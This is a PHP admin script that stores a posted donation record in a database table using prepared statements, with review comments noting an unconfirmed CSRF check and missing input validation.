
Current File : E:/Inetpub/www/news/csr/admin/core/add_donate_detail.php
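<?php
/**
 * Admin handler: stores one donation record posted from the donate form in
 * tb_donated, then redirects back to the account page.
 *
 * Access control: only checks that $_SESSION['ugroup'] is set; anything else
 * is redirected to ../index.php?msg=error.
 *
 * NOTE(review): no anti-CSRF token check is visible in this file. This is a
 * state-changing POST handler, so confirm one is enforced elsewhere (e.g. in
 * include/config.php) or add one.
 * NOTE(review): field values are stored as received; length/format validation
 * (postcode, phone, date parts) is not done here - confirm where it happens.
 */
if (!isset($_SESSION)) session_start();

if (!isset($_SESSION['ugroup'])) {
    // Not logged in: same redirect as before, nothing is read or written.
    header("Location: ../index.php?msg=error");
    exit;
}

$user = isset($_SESSION["loguser"]) ? $_SESSION["loguser"] : '';
// Not used below; kept because the included files share this scope and may
// read them - TODO confirm, then remove.
$ugroup = $_SESSION["ugroup"];
$setyear = date("Y") + 543; // current year + 543

require_once "../../include/config.php";       // presumably defines $mysqli - verify
require_once "../../include/PasswordHash.php";

// Fixed allow-list of form fields; each name is also the column name.
// Column names never come from the request, only the bound values do.
$fields = [
    'u_donate', 'u_name', 'u_address', 'u_subdistrict', 'u_district',
    'u_province', 'u_postcode', 'u_tel', 'u_type', 'u_datail',
    'u_max', 'u_sarary', 'u_date', 'u_month', 'u_year',
];

// u_scid is taken from the session, never from the request.
$values = [(string) $user];
foreach ($fields as $field) {
    // Missing or non-string (array) inputs are stored as an empty string.
    $values[] = (isset($_POST[$field]) && is_string($_POST[$field])) ? $_POST[$field] : '';
}

// Every value, including the session-derived $user, is bound as a parameter
// instead of being interpolated into the statement text.
$sql = "INSERT INTO tb_donated (u_scid, " . implode(', ', $fields) . ") "
     . "VALUES (" . implode(', ', array_fill(0, count($values), '?')) . ")";

$stmt = $mysqli->prepare($sql);
$ok = false;
if ($stmt) {
    $types = str_repeat('s', count($values));
    $stmt->bind_param($types, ...$values);
    $ok = $stmt->execute();
}

if (!$ok) {
    // Keep database details in the server log; the client gets a generic
    // message only.
    error_log('add_donate_detail: insert failed: ' . ($stmt ? $stmt->error : $mysqli->error));
    if ($stmt) {
        $stmt->close();
    }
    http_response_code(500);
    exit('Unable to save the record.');
}
$stmt->close();

// No output may precede this header, otherwise the redirect is not sent.
header("Location: ../account.php?page=donate_detail&op31=1&msg=added_ok");
exit;
?>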
